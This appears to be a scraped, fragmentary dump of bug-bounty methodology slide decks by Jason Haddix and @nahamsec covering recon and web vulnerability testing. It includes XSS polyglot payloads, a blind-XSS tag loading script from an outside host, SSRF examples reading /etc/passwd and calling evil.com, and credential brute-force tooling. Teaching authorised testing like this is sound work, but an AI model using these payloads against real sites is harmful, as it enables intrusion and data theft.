Professional Documents
Culture Documents
1
whoami
Jason Haddix
● Bugcrowd
● Director of Technical Ops
● Hacker & Bug hunter
● #1 on all-time leaderboard bugcrowd 2014
@jhaddix
2
What this talk’s about...
Hack
Stuff
Better
(and practically)
And…LOTS of memes…. only some are funny
3
More Specifically
Step 1: Cut a hole in a box... j/k
5
Differences from standard testing
Single-sourced Crowdsourced
● looking mostly for ● looking for vulns that
common-ish vulns aren’t as easy to find
● not competing with ● racing vs. time
others ● competitive vs. others
● incentivized for count ● incentivized to find
● payment based on sniff unique bugs
test ● payment based on
impact not number of
findings
6
The regular methodologies
7
Discovery
8
Find the road less traveled
^ means find the application (or parts of an
application) less tested.
1. *.acme.com scope is your friend
2. Find domains via Google (and others!)
a. Can be automated well via recon-ng
and other tools.
3. Port scan for obscure web servers or
services (on all domains)
4. Find acquisitions and the bounty
acquisition rules
a. Google has a 6 month rule
5. Functionality changes or re-designs
6. Mobile websites
9 7. New mobile app versions
Tool: Recon-ng script (enumall.sh)
10 https://github.com/jhaddix/domain
11
LMGTFY
12
LMGTFY
13
14
https://www.facebook.com/notes/phwd/facebook-bug-bounties/707217202701640
15
Port Scanning!
Port scanning is not just for Netpen!
A full port scan of all your new found targets will usually
yield #win:
● separate webapps
● extraneous services
● Facebook had Jenkins Script console with no auth
● IIS.net had rdp open vulnerable to MS12_020
17
Mapping tips
● Google
● *Smart* Directory Brute Forcing
● RAFT lists (included in Seclists)
● SVN Digger (included in Seclists)
● Git Digger
● Platform Identification:
● Wapplyzer (Chrome)
● Builtwith (Chrome)
● retire.js (cmd-line or Burp)
● Check CVE’s
● Auxiliary
● WPScan
● CMSmap
18
Directory Bruteforce Workflow
After bruteforcing look for other status codes indicating you are denied or require auth then
append list there to test for misconfigured access control.
Example:
20
Intrigue
New OSINT/Mapping project, intrigue:
21
22
Intrigue and Maps projects
New OSINT/Mapping project, intrigue:
23
Crawling
Using + Ruby + Anemone + JSON + Grep
https://test_target/redirect/?url=http://twitter.com/...
https://test_target/redirect/?url=http://facebook.com/...
https://test_target/redirect/?url=http://pinterest.com/...
24
Intrigue Tasks
Using + Ruby + Anemone + JSON + Grep
● Brute force
● Spider
● Nmap
● etc
25
26
27
Auth and Session
28
Auth (better be quick)
Auth Related (more in logic, priv, and transport sections)
29
Session (better be quick)
Session Related
30
Tactical Fuzzing - XSS
31
XSS
Core Idea: Does the page functionality display something to the users?
32
XSS
';alert(String.fromCharCode(88,83,83))//';alert(String.
fromCharCode(88,83,83))//";alert(String.fromCharCode
(88,83,83))//";alert(String.fromCharCode(88,83,83))//--
></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))
</SCRIPT>
Multi-context, filter bypass based polyglot payload #1 (Rsnake XSS Cheat Sheet)
33
XSS
'">><marquee><img src=x onerror=confirm(1)></marquee>"
></plaintext\></|\><plaintext/onmouseover=prompt(1)
><script>prompt(1)</script>@gmail.com<isindex
formaction=javascript:alert(/XSS/) type=submit>'-->"
></script><script>alert(1)</script>"><img/id="confirm(
1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http:
//i.imgur.com/P8mL8.jpg">
34
Multi-context, filter bypass based polyglot payload #2 (Ashar Javed XSS Research)
XSS
35
Other XSS Input Vectors
URI based
Common Params:
\%22})))}catch(e){alert(document.domain);}//
"]);}catch(e){}if(!self.a)self.a=!alert(document.domain);//
"a")(({type:"ready"}));}catch(e){alert(1)}//
37
SWF Parameter XSS
38
Tactical Fuzzing - SQLi
39
SQL Injection
Core Idea: Does the page look like it might need to call on stored data?
Works in single quote context, works in double quote context, works in “straight into query”
context! (Mathias Karlsson)
40
SQL Injection
You can also leverage the large database of
fuzzlists from Seclists here:
41
SQL Injection Observations
Common Parameters or Injection points
Blind is predominant, Error based is highly unlikely.
ID
43
Best SQL injection resources
DBMS Specific Resources
mySQL PentestMonkey's mySQL injection cheat sheet
Reiners mySQL injection Filter Evasion Cheatsheet
MSSQL EvilSQL's Error/Union/Blind MSSQL Cheatsheet
PentestMonkey's MSSQL SQLi injection Cheat Sheet
ORACLE PentestMonkey's Oracle SQLi Cheatsheet
45
Local file inclusion
Core Idea: Does it (or can it) interact with the server file system?
Liffy is new and cool here but you can also use Seclists: Common Parameters or Injection points
file=
location=
locale=
path=
display=
load=
read=
46 retrieve=
Malicious File Upload ++
This is an important and common attack vector in this type of testing
Attacks:
● Upload unexpected file format to achieve code exec (swf, html, php, php3, aspx, ++) Web
shells or...
● Execute XSS via same types of files. Images as well!
● Attack the parser to DoS the site or XSS via storing payloads in metadata or file header
● Bypass security zones and store malware on target site via file polyglots
47
Malicious File Upload ++
File upload attacks are a whole presentation. Try this one to get a feel for bypass techniques:
48
Malicious File Upload ++
49
Remote file includes and redirects
Look for any param with another web address Redirections Common Parameters or Injection
points
in it. Same params from LFI can present here too.
dest=
File= document=
Folder= root=
Path= pg=
style= pdf=
template=
php_path=
51
doc=
CSRF
52
CSRF
Everyone knows CSRF but the TLDR
here is find sensitive functions and
attempt to CSRF.
53
CSRF
Many sites will have CSRF protection, focus on CSRF bypass!
Common bypasses:
Step 1: Enable logging in Burp. Crawl a site with Burp completely executing all
functions.
55
56
CSRF
Step 3: Run burpy on Burp log file..
Logic:
https://github.
com/arvinddoraiswamy/mywebappscripts/blob/master/BurpExtensions/csrf_token_d
etect.py
60
CSRF
CSRF Common Critical functions
61
Privilege, Transport, Logic
62
Privilege
Often logic, priv, auth bugs are blurred.
63
Privilege
1. Find site functionality that is restricted to certain Common Functions or Views
user types Add user function
2. Try accessing those functions with lesser/other
Delete user function
user roles
3. Try to directly browse to views with sensitive start project / campaign / etc function
information as a lesser priv user
change account info (pass, CC, etc) function
64
1. Browse using high priv user
2. Login with a lower priv user
3. Burp Plugin re-requests to see if low priv can access high priv
65
Insecure direct object references
IDORs are common place in bounties, and hard
to catch with scanners.
Receipts
67
68
Transport
Most security concerned sites will enable HTTPs. It’s
your job to ensure they’ve done it EVERYWHERE. Most
of the time they miss something.
Examples:
69
Transport
https://github.com/arvinddoraiswamy/mywebappscripts/tree/master/ForceSSL
70
Logic
Logic flaws that are tricky, mostly manual:
71
Mobile
72
Data Storage
73
Quick spin-up for iOS
Daniel Mayers idb tool:
74
Logs!
75
Auxiliary
76
The vulns formerly known as “noise”
● Content Spoofing or HTML injection
● Referer leakage
● security headers
● path disclosure
● clickjacking
● ++
77
How to test a web app in n minutes
How can you get maximum results within a
given time window?
78
Data Driven Assessment (diminishing return FTW)
1. Visit the search, registration, contact, and password reset, and comment
forms and hit them with your polyglot strings
2. Scan those specific functions with Burp’s built-in scanner
3. Check your cookie, log out, check cookie, log in, check cookie. Submit old
cookie, see if access.
4. Perform user enumeration checks on login, registration, and password
reset.
5. Do a reset and see if; the password comes plaintext, uses a URL based
token, is predictable, can be used multiple times, or logs you in
automatically
6. Find numeric account identifiers anywhere in URL and rotate them for
context change
7. Find the security-sensitive function(s) or files and see if vulnerable to
non-auth browsing (idors), lower-auth browsing, CSRF, CSRF protection
bypass, and see if they can be done over HTTP.
8. Directory brute for top short list on SecLists
9. Check upload functions for alternate file types that can execute code (xss
or php/etc/etc)
79
~ 15 minutes
Things to take with you…
1. Crowdsourced testing is different enough to pay attention to
2. Crowdsourcing focuses on the 20% because the 80% goes quick
3. Data analysis can yield the most successfully attacked areas
4. A 15 minute web test, done right, could yield a majority of your critical vulns
5. Add polyglots to your toolbelt
6. Use SecLists to power your scanners
7. Remember to periodically refresh your game with the wisdom of other techniques and
other approaches
80
Gitbook project: The Bug Hunters Methodology
This preso ended up to be way too much to fit in an 45min talk so... we turned it into a Git
project! (if you are reading this from the Defcon DVD check my twitter or Github for linkage)
81
Meme Count:
13
82
Attribution and Thanks
83
Tim Tomes - Recon-ng
Joe Giron - RFI params
Soroush Dalili - File in the Hole preso
Mathias Karlsson - polyglot research
Ashar Javed - polyglot/xss research
Ryan Dewhurst & Wpscan Team
Bitquark - for being a ninja, bsqli string
rotlogix - liffy LFI scanner
Arvind Doraiswamy - HTTPs, CSRF Burp Plugins
Barak Tawily - Autorize burp plugin
the RAFT list authors
Ferruh Mavituna - SVNDigger
Jaime Filson aka wick2o - GitDigger
Robert Hansen aka rsnake - polyglot / xss
Dan Crowley - polyglot research
Daniel Miessler - methodology, slide, and data contributions
My awesome team at Bugcrowd (Jon, Tod, Shpend, Ben, Grant, Fatih, Patrik, Kati, Kym, Abby, Casey, Chris, Sam, ++)
84
All the bug hunting community!!!
Domain Discovery
Expanding your scope like a boss
whoami
Builtwith
spider Wappalyzer Gobuster
Parameth
Github Vulners Burp Wordlists
Burp analyze target
++ Plugin Burp
++
ASN’s
★ https://whois.arin.net/ui/query.do
★ https://apps.db.ripe.net/db-web-ui/#/fulltextsearch
Rev whois
★ http://viewdns.info/
★ http://domainbigdata.com/
Rev whois
★ https://reverse.report/
Acquisitions
★ Crunchbase
★ Protected by
distil bot
protection
★ Stay tuned
Shodan Organization
★ https://www.shodan.io/search?query
=org%3A%22Tesla+Motors%22
Others
crt.sh
ThreatCrowd Virustotal
★ Cloudflare
★ Censys.io
★ Haven't tested but love
the ideas
Sub Bruting
all.txt
https://gist.github.com/jhaddix/86a06c5dc309d085
80a018c66354a056
Permutation Scanning
Altdns : https://github.com/infosec-au/altdns
Permutation Scanning
https://github.com/jfrancois/SDBF
https://www.foo.be/papers/sdbf.pdf
Port Scanning
65536 unverified Hosts (a large targets ASN)
Tool Time to run Found
masscan
masscan
You can use a conf file for this! 11m4.164s 196
-p1,3-4,6-7,9,13,17,19-26,30,32-33,37,42-43,49,53,70,79-85,88-90,99-100,106,109-111,113,119,125,135,139,143-144,146,161,163,179,199,211-212,222,254-256,259,264,280,301,306,311,
340,366,389,406-407,416-417,425,427,443-445,458,464-465,481,497,500,512-515,524,541,543-545,548,554-555,563,587,593,616-617,625,631,636,646,648,666-668,683,687,691,700,705
,711,714,720,722,726,749,765,777,783,787,800-801,808,843,873,880,888,898,900-903,911-912,981,987,990,992-993,995,999-1002,1007,1009-1011,1021-1100,1102,1104-1108,1110-111
4,1117,1119,1121-1124,1126,1130-1132,1137-1138,1141,1145,1147-1149,1151-1152,1154,1163-1166,1169,1174-1175,1183,1185-1187,1192,1198-1199,1201,1213,1216-1218,1233-1234,
1236,1244,1247-1248,1259,1271-1272,1277,1287,1296,1300-1301,1309-1311,1322,1328,1334,1352,1417,1433-1434,1443,1455,1461,1494,1500-1501,1503,1521,1524,1533,1556,1580,15
83,1594,1600,1641,1658,1666,1687-1688,1700,1717-1721,1723,1755,1761,1782-1783,1801,1805,1812,1839-1840,1862-1864,1875,1900,1914,1935,1947,1971-1972,1974,1984,1998-2010
,2013,2020-2022,2030,2033-2035,2038,2040-2043,2045-2049,2065,2068,2099-2100,2103,2105-2107,2111,2119,2121,2126,2135,2144,2160-2161,2170,2179,2190-2191,2196,2200,2222,2
251,2260,2288,2301,2323,2366,2381-2383,2393-2394,2399,2401,2492,2500,2522,2525,2557,2601-2602,2604-2605,2607-2608,2638,2701-2702,2710,2717-2718,2725,2800,2809,2811,286
9,2875,2909-2910,2920,2967-2968,2998,3000-3001,3003,3005-3007,3011,3013,3017,3030-3031,3052,3071,3077,3128,3168,3211,3221,3260-3261,3268-3269,3283,3300-3301,3306,3322-
3325,3333,3351,3367,3369-3372,3389-3390,3404,3476,3493,3517,3527,3546,3551,3580,3659,3689-3690,3703,3737,3766,3784,3800-3801,3809,3814,3826-3828,3851,3869,3871,3878,38
80,3889,3905,3914,3918,3920,3945,3971,3986,3995,3998,4000-4006,4045,4111,4125-4126,4129,4224,4242,4279,4321,4343,4443-4446,4449,4550,4567,4662,4848,4899-4900,4998,5000
-5004,5009,5030,5033,5050-5051,5054,5060-5061,5080,5087,5100-5102,5120,5190,5200,5214,5221-5222,5225-5226,5269,5280,5298,5357,5405,5414,5431-5432,5440,5500,5510,5544,5
550,5555,5560,5566,5631,5633,5666,5678-5679,5718,5730,5800-5802,5810-5811,5815,5822,5825,5850,5859,5862,5877,5900-5904,5906-5907,5910-5911,5915,5922,5925,5950,5952,595
9-5963,5987-5989,5998-6007,6009,6025,6059,6100-6101,6106,6112,6123,6129,6156,6346,6389,6502,6510,6543,6547,6565-6567,6580,6646,6666-6669,6689,6692,6699,6779,6788-6789,
6792,6839,6881,6901,6969,7000-7002,7004,7007,7019,7025,7070,7100,7103,7106,7200-7201,7402,7435,7443,7496,7512,7625,7627,7676,7741,7777-7778,7800,7911,7920-7921,7937-79
38,7999-8002,8007-8011,8021-8022,8031,8042,8045,8080-8090,8093,8099-8100,8180-8181,8192-8194,8200,8222,8254,8290-8292,8300,8333,8383,8400,8402,8443,8500,8600,8649,8651
-8652,8654,8701,8800,8873,8888,8899,8994,9000-9003,9009-9011,9040,9050,9071,9080-9081,9090-9091,9099-9103,9110-9111,9200,9207,9220,9290,9415,9418,9485,9500,9502-9503,9
535,9575,9593-9595,9618,9666,9876-9878,9898,9900,9917,9929,9943-9944,9968,9998-10004,10009-10010,10012,10024-10025,10082,10180,10215,10243,10566,10616-10617,10621,10
626,10628-10629,10778,11110-11111,11967,12000,12174,12265,12345,13456,13722,13782-13783,14000,14238,14441-14442,15000,15002-15004,15660,15742,16000-16001,16012,1601
6,16018,16080,16113,16992-16993,17877,17988,18040,18101,18988,19101,19283,19315,19350,19780,19801,19842,20000,20005,20031,20221-20222,20828,21571,22939,23502,24444,2
4800,25734-25735,26214,27000,27352-27353,27355-27356,27715,28201,30000,30718,30951,31038,31337,32768-32785,33354,33899,34571-34573,35500,38292,40193,40911,41511,425
10,44176,44442-44443,44501,45100,48080,49152-49161,49163,49165,49167,49175-49176,49400,49999-50003,50006,50300,50389,50500,50636,50800,51103,51493,52673,52822,52848
,52869,54045,54328,55055-55056,55555,55600,56737-56738,57294,57797,58080,60020,60443,61532,61900,62078,63331,64623,64680,65000,65129,65389,280,4567,7001,8008,9080 -iL
$TARGET_LIST --max-rate 100000 -oG $TARGET_OUTPUT
nmap zzz
∞
Visual Identification
★ Because of the nature of scraping and dns redirects some sites will
be gone or the same.
★ Gotta get an idea of what is up and unique
★ We also don’t know what protocol these are on (http vs https, ++)
Auxiliary
★ Dnssec / nsec / nsec3 walking
○ Ldnsutils, nsec3walker, nsec3map
★ Github recon
https://github.com/appsecco/bugcrowd-levelup-subdomain-enum
○ Search for goodies eration/blob/master/esoteric_subdomain_enumeration_techni
ques.pdf
★ Burp suite scope filters
https://www.youtube.com/watch?v=1Kg0_53ZEq8
○ Simple and effective
○ Start with target, spider, scope down to
keywords, repeat
★ Dorking: ads key, priv pol, tos, aws, s3
Linked Discovery - BURP SUITE (DEMO)
Platform Identification
and CVE searching
Content Discovery /
Directory Bruting
★ Gobuster
★ Burp content discovery
★ Robots disallowed
★ ¯\_(ツ)_/¯
Parameter Bruting?
★ Yep! - Untested but love the idea
★ Can be combined with backslash scanners top 2500 params
Automation?
★ Somewhat
★ Best-in-breed tools/sites change,
automation needs to support bespoke tooling
★ HODOR:
○ A security testing Slackbot built with a
Kubernetes backend on the Google Cloud
Platform
★ Kubebot:
○ A security testing Slackbot built with a
Kubernetes backend on the Google Cloud
Platform
★ Assetnote
★ Datasploit & intrigue
QUICK BASH WINS (hostme.sh)
QUICK BASH WINS (rundns.sh)
QUICK BASH WINS (bust.sh)
QUICK BASH WINS (mass.sh)
QUICK BASH WINS (certspotter.sh)
#!/bin/bash
Ty Jobert!
The Bug Hunters
Methodology v2.1
whoami
Hack
Stuff
Better
(and practically)
And…LOTS of memes…. only some are funny
history && topics
★ philosophy shifts
Aka “How to Shot Web” @ DEFCON23
★ discovery techniques ★ Subdomain & Discovery
★ mapping methodology ★ SQLi
★ parameters oft attacked ★ XSS
★ useful fuzz strings ★ File Uploads
★ bypass or filter evasion techniques ★ CSRF
★ new/awesome tooling ★ Privilege, Auth, IDOR
★ memes
v2
★ MOAR discovery
★ xss ★ Infrastructure and config
★ ssti ★ WAF
★ ssrf ★ SOAP Testing
★ Code Inj / cmdi /
advancements in
fuzzing
light reading
Discovering New Targets
Discovery
★ Plazmaz Fork
★ Fleetcaptain fork
Sublist3r
★ Fleetcaptain fork
Sub Scraping
ThreatCrowd Virustotal
★ Cloudflare
★ Censys.io
★ Haven't tested but love
the ideas
Sub Bruting
all.txt
https://gist.github.com/jhaddix/86a06c5dc309d085
80a018c66354a056
Acquisitions
★ Crunchbase
★ wikipedia
Port Scanning
65536 unverified Hosts (a large targets ASN)
Tool Time to run Found
nmap zzz
∞
Interlude... credential bruteforce
Brutespray
Nmap service
masscan credential
scan -oG
bruteforce
Interlude... credential bruteforce
Visual Identification
★ Gobuster
★ Burp content discovery
★ Robots disallowed
★ ¯\_(ツ)_/¯
CommonSpeak and
Scans.io data
★ Subdomain data is
awesome
Parameter Bruting?
★ Yep! - Untested but love the idea
★ Can be combined with backslash scanners top 2500 alexa params
Domain Domain
Identify IPs bruteforcing, Visual
scraping for Portscan
and main TLDs Resolve && add Identification
discovered TLDs new IP ranges
ASNs enumall
Reverse Whois Massdns masscan
sublist3r eyewitness
Acquisitions Manual
++
++
1 Jamie: I really
enjoy my super
Frans: I really admin access
enjoy my NEW this morning !!!
super admin
access this
morning !!! “><script src=//y.vg></script> 2
4
l !!#!
vascript shel
Y.vg is a a ja
3
XSSHunter
Payload:
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert()
)//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csV
g/<sVg/oNloAd=alert()//>\x3e
Jackmasa’s
XSS
Mindmap
https://github.com/jhaddix/XSS.png
Server Side Template
Injection
SSTI
TBHMv1
❏ Nothing
preview redirect
id
view
activity
name
http://acme.com/script?name={{2*3}}
Server Side Request
Forgery
SSRF Common Parameters or Injection
points from TBHMv1
TBHMv1 ★ Where? file= folder=
❏ Nothing ★ Resources
❏ Well kinda... SSRF ○ SSRF Bible (black magic)
location= style=
http://ACME.com/redirect.php?url=file:///etc/passwd
http://acme.com/ssrf.php?url=tftp://evil.com:12346/TESTPACKET
SSRF Resources
SSRF Resources
★ protocol
and
schema
mappings
★ Exploit
examples
Server Side Request Forgery
{regex + perm} dest {regex} redirect {regex + perm} uri {regex} path
{regex} port
http://acme.com/script?uri=ftp://site
Code Inj, CDMi, & Future
Fuzzing, ++
Code Injection + CMD
Injection + New Fuzzing
TBHMv1
❏ Sqli ★ Commix
❏ Polyglot ○ CMDi
❏ Seclists ○ Supports php code inj
❏ Sqlmap ★ Unknown Identification
❏ Params ○ Backslash Powered Scanner
❏ Tooling ★ resources
❏ resources albinowax (James Kettle)
IDOR - MFLAC
★ IDs
★ Hashes
★ Emails
Insecure Direct Object Reference
http://acme.com/script?user=21856
Code Injection + CMD
Injection
★ Commix pros
○ Command injection
○ Supports php code inj
○ Custom modules
○ PS & PY shells
○ Put many memes in their slides
Backslash Powered Scanner
★ Generic payloads for any stack
○ Send a ‘ get an error
○ Send a \‘ and the backslash escapes your injection
character
★ Multi-tiered, Simple, and effective response analyzing
○ Response code
○ Response size
○ keywords
★ Watch the video then read the paper =)
○ https://broadcast.comdi.com/r7rwcspee75eewbu8a0f
○ http://blog.portswigger.net/2016/11/backslash-pow
ered-scanning-hunting.html
Infrastructure & Config
Subdomain takeover!
★ Dev.domain.com
★ Stage.domain.com
★ ww1/ww2/ww3...domain.com
★ www.domain.uk/jp/...
★ ...
★ https://twitter.com/Jhaddix/status/964714566910279680
SOAP Services
Bespoke .nfo
Bespoke .nfo
resources!
SSRF Pivoting from blind SSRF to RCE with HashiCorp http://www.kernelpicnic.net/2017/05/29/Pivoting-from-blind-SSRF
Resources
Consul - Peter Adkins -to-RCE-with-Hashicorp-Consul.html
Resources
Consul - Peter Adkins -to-RCE-with-Hashicorp-Consul.html
Resources
OWASP SSTI Workshop - https://speakerdeck.com/owaspmontreal/workshop-server-side-template-i
Gérôme Dieu njection-ssti
Hi Pete!
Rails Dynamic Render to https://nvisium.com/blog/2016/01/26/rails-dynamic-render-to-rce-cve-201
RCE (CVE-2016-0752) - 6-0752/
John Poulin
aboul3la https://github.com/aboul3la/Sublist3r
jhaddix https://github.com/jhaddix/domain
blechschmidt https://github.com/blechschmidt/massdns
robertdavidgraham https://github.com/robertdavidgraham/masscan
anshumanbh https://github.com/anshumanbh/brutesubs
OJ Reeves https://github.com/OJ/gobuster
Links epinna https://github.com/epinna/tplmap
https://github.com/mak-/parameth
https://gist.github.com/anshumanbh/96a0b81dfe318e9e9560
13209e178fa9
https://github.com/ChrisTruncer/EyeWitness
https://github.com/jackmasa/XSS.png
https://gist.github.com/jhaddix/86a06c5dc309d08580a018c66
354a056
https://github.com/lorenzog/dns-parallel-prober
Links SSRF Bible https://docs.google.com/document/d/1v1TkWZtrhzRLy0bY
XBcdLUedXGb9njTNIJXa3u9akHM/edit#
https://github.com/ewilded/psychoPATH
https://github.com/commixproject/commix
Links https://github.com/qazbnm456/awesome-web-security
https://github.com/infoslack/awesome-web-hacking
https://github.com/djadmin/awesome-bug-bounty
Jason Haddix - @jhaddix
jhaddix@bugcrowd.com
The Bug Hunters
Methodology v3(ish)
Video: https://www.youtube.com/watch?v=Qw1nNPiH_Go
whoami
s
history && topics
★ https://whois.arin.net/ui/query.do
★ https://apps.db.ripe.net/db-web-ui/#/fulltextsearch
Rev whois
★ https://reverse.report/
Shodan Organization
★ https://www.shodan.io/search?query
=org%3A%22Tesla+Motors%22
Discovering New Targets
(Brands & TLDs)
Brand / TLD Discovery
Weighted Link
and REVERSE ★ DomLink
TRACKER analysis ★ bUILTWITH
Acquisitions
Linked Discovery (Burp Demo)
#!/bin/bash
mkdir $1
touch $1/$1.txt
amass -active -d $1 |tee /root/tools/amass/$1/$1.txt
Sublist3r Subfinder
● Subfinder by ICEMAN
● https://github.com/ice3man543/subfinder
● Json output, multi resolver for bruteforce, ++
#!/bin/bash
mkdir $1
touch $1/$1.txt
subfinder -d $1 |tee /root/tools/subfinder/$1/$1.txt
Fancy table referencing runtimes ++
all.txt
https://gist.github.com/jhaddix/86a06c5dc309d085
80a018c66354a056
CommonSpeak and
Scans.io data
nmap zzz
∞
#!/bin/bash
strip=$(echo $1|sed 's/https\?:\/\///')
echo ""
echo "##################################################"
host $strip
echo "##################################################"
echo ""
masscan -p1-65535 $(dig +short $strip|grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b"|head -1)
--max-rate 1000 |& tee $strip_scan
Credential bruteforce
Brutespray
Nmap service
masscan credential https://github.com/x90skysn3k/brutespray
scan -oG
bruteforce
★ Because of the nature of scraping and dns redirects some sites will be
gone or the same.
★ Gotta get an idea of what is up and unique
★ We also don’t know what protocol these are on (http vs https, ++)
Aquatone? Httpscreenshot?
Wayback Enumeration
TIME OUT
Xmind Organization
★ Gobuster
★ Burp content discovery
★ Robots disallowed
★ ¯\_(ツ)_/¯
Content Discovery / Directory Bruting
★ https://gist.github.com/jhaddix/b80
ea67d85c13206125806f0828f4d10
★ But still gold
Parameter Bruting?
★ Yep! - Untested but love the idea
★ Can be combined with backslash scanners top 2500 alexa params
Domain Domain
Identify IPs bruteforcing, Visual
scraping for Portscan
and main TLDs Resolve && add Identification
discovered TLDs new IP ranges
ASNs aMASS
Reverse Whois Massdns masscan
SUBFINDER eyewitness
Acquisitions Manual
++
++
Builtwith gobuster
Wappalyzer Wordlists Parameth
++ Burp Burp analyze target
XSS
Blind XSS Frameworks Continued!
u p p or t
SMS S
Server Side Request
Forgery
What to do with SSRF?
https://gist.github.com/jhaddix/78cece26c91c6263653f31ba453e273b
Insecure direct object
reference
IDOR - MFLAC
★ IDs
★ Hashes
★ Emails
Insecure Direct Object Reference
http://acme.com/script?user=21856
Infrastructure & Config
Subdomain takeover!
★ Dev.domain.com
★ Stage.domain.com
★ ww1/ww2/ww3...domain.com
★ www.domain.uk/jp/...
★ ...
★ https://twitter.com/Jhaddix/status/964714566910279680
The future of TBHM
Old
2 @nahamsec
AGENDA 1. Overview
2. Asset Discovery
3. Content Discovery
4. Automation
5. Digital Dumpster Diving
6. Real Life Examples
3 @nahamsec
Why?
● Self improvement
● Networking
● My career was built / boosted thanks to
bug bounties
4 @nahamsec
Why?
● Self improvement
● Networking
● My career was built / boosted thanks to
bug bounties
● Competition makes it more fun
5 @nahamsec
Why?
● Self improvement
● Networking
● My career was built / boosted thanks to
bug bounties
● Competition makes it more fun
6 @nahamsec
Why?
● Self improvement
● Networking
● My career was built / boosted thanks to
bug bounties
● Competition makes it more fun
● … who doesn’t like extra cash?
7 @nahamsec
Reconnaissance
8
Recon (Definition)
In military operations, reconnaissance or scouting is the
exploration outside an area occupied by friendly forces to gain
information about natural features and other activities in the area.
9 @nahamsec
Recon (Definition)
● Understanding how the application is built
● Understanding how the application processes data
● Finding all possible “entry” points or company assets
● and finding as many files, folders, or endpoints
10 @nahamsec
11 @nahamsec
Asset Discovery
12
13 @nahamsec
Asset Discovery
● sublist3r
● enumall
● Brute force ● massdns
● Find different environments (.dev, ● altdns
.corp, .stage, uat, etc.) ● brutesubs
● dns-parallel-prober
● Brute force again
● dnscan
○ Different permutations ● knockpy
○ Different environment ● tko-subs
■ dashboard.dev.site.com vs ● HostileSubBruteforce
dashboard-dev.site.com
15 @nahamsec
Certificate Transparency
How do you find more?
16
Censys
● Look for SSL certificates:
○ Example: 443.https.tls.certificate.parsed.extensions.subject_alt_name.dns_names:snapchat.com
17 @nahamsec
Shodan
● Search by hostname
● Filter for
○ Ports: 8443, 8080, 8180, etc
○ Title: “Dashboard [Jenkins]”
○ Product:Tomcat
○ Hostname: somecorp.com
○ Org: evilcorp
○ ssl: Google
18 @nahamsec
Certspotter
● Great API
● Easy to automate:
○ Make a bash alias
○ Automate
○ Win
19 @nahamsec
Certspotter
● Great API
● Easy to automate: We’ll get to this later
○ Make a bash alias
○ Automate
○ Win
20 @nahamsec
Crt.sh
● Great API and web interface
● Allows using a wild card
● Sometimes you get different results from differents
sources
https://crt.sh/?q=www.snapchat.%
21 @nahamsec
OSINT
What about other properties?
22
23 @nahamsec
Acquisitions
24 @nahamsec
ARIN
25 @nahamsec
ARIN
26 @nahamsec
ARIN
27 @nahamsec
Shodan also helps with this
ARIN
28 @nahamsec
Content Discovery
Where the fun begins
29
30 @nahamsec
Content Discovery
● Port scan
31 @nahamsec
Content Discovery
● Port scan
● Screenshot open ports (default:
80, 443)
32 @nahamsec
Content Discovery
● Port scan
● Screenshot open ports (default:
80, 443)
● Look for interesting
○ Files
○ Directories
33 @nahamsec
Example
● You see an open port on example.com:8433
34 @nahamsec
Example
● You see an open port on example.com:8433
● Directory brute force
35 @nahamsec
Example
● You see an open port on 8433
● Directory brute force
● /admin/ returns 403
36 @nahamsec
Example
● You see an open port on 8433
● Directory brute force
● /admin/ returns 403
● You brute force for more files/directories on /admin/
37 @nahamsec
Example
● You see an open port on 8433
● Directory brute force
● /admin/ returns 403
● You brute force for more files/directories on /admin/
● /admin/users.php returns 200
38 @nahamsec
Example
● You see an open port on 8433
● Directory brute force
● /admin/ returns 403
● You brute force for more files/directories on /admin/
● /admin/users.php returns 200
● Repeat on other domains, ports, folders, etc.
39 @nahamsec
Content Discovery
● Nmap common ports
(3868,3366,8443,8080,9443,9091,3000,8000,5900,8081,6000,1 ● dirbuster
0000,8181,3306,5000,4000,8888,5432,15672,9999,161,4044,7 ● gograbber
077,4040,9000,8089,443,7447,7080,8880,8983,5673,7443)
● gobuster
● Take screenshots (webscreenshot.py)
● dirsearch
● Directory/File brute force ● Probably more tools out there?
40 @nahamsec
Content Discovery
● Nmap common ports
(3868,3366,8443,8080,9443,9091,3000,8000,5900,8081,6000,1 ● dirbuster
0000,8181,3306,5000,4000,8888,5432,15672,9999,161,4044,7 ● gograbber
077,4040,9000,8089,443,7447,7080,8880,8983,5673,7443)
● gobuster
● Take screenshots (webscreenshot.py)
● dirsearch
● Directory/File brute force ● Probably more tools out there?
● Robots.txt sometimes does
this for you ¯\_(ツ)_/¯
41 @nahamsec
Content Discovery
● ALWAYS keep an archive of your reports..
42 @nahamsec
Content Discovery
● ALWAYS keep an archive of your reports..
43 @nahamsec
Automation
44
45 @nahamsec
AWS Recon
46 @nahamsec
AWS Recon
48 @nahamsec
S3 Automation
49 @nahamsec
S3 Automation
50 @nahamsec
Certspotter
● Great API
● Easy to automate:
○ Make an alias
○ Automate
○ Win
51 @nahamsec
Create aliases
certspotter(){
curl -s https://certspotter.com/api/v0/certs\?domain\=$1 | jq '.[].dns_names[]' | sed 's/\"//g' | sed
's/\*\.//g' | sort -u | grep $1 > ~/$1/$1.txt
}
52 @nahamsec
Create aliases
certspotter(){
curl -s https://certspotter.com/api/v0/certs\?domain\=$1 | jq '.[].dns_names[]' | sed 's/\"//g' | sed
's/\*\.//g' | sort -u | grep $1 > ~/$1/$1.txt
}
dirbruteforce(){
cd /tools/dirsearch
cat ~/$1/$1.txt | while read line; do python3 dirsearch.py -e . -u "https://$line"; done
}
53 @nahamsec
Create aliases
certspotter(){
curl -s https://certspotter.com/api/v0/certs\?domain\=$1 | jq '.[].dns_names[]' | sed 's/\"//g' | sed
's/\*\.//g' | sort -u | grep $1 > ~/$1/$1.txt
}
dirbruteforce(){
cd /tools/dirsearch
cat ~/$1/$1.txt | while read line; do python3 dirsearch.py -e . -u "https://$line"; done
}
screenshot(){
python ~/tools/webscreenshot/webscreenshot.py -o ./$1/screenshots/ -i ~/$1/$1.txt --timeout=10 -m
}
54 @nahamsec
Create aliases
certspotter(){
curl -s https://certspotter.com/api/v0/certs\?domain\=$1 | jq '.[].dns_names[]' | sed 's/\"//g' | sed
's/\*\.//g' | sort -u | grep $1 > ~/$1/$1.txt
}
dirbruteforce(){
cd /tools/dirsearch
cat ~/$1/$1.txt | while read line; do python3 dirsearch.py -e . -u "https://$line"; done
}
screenshot(){
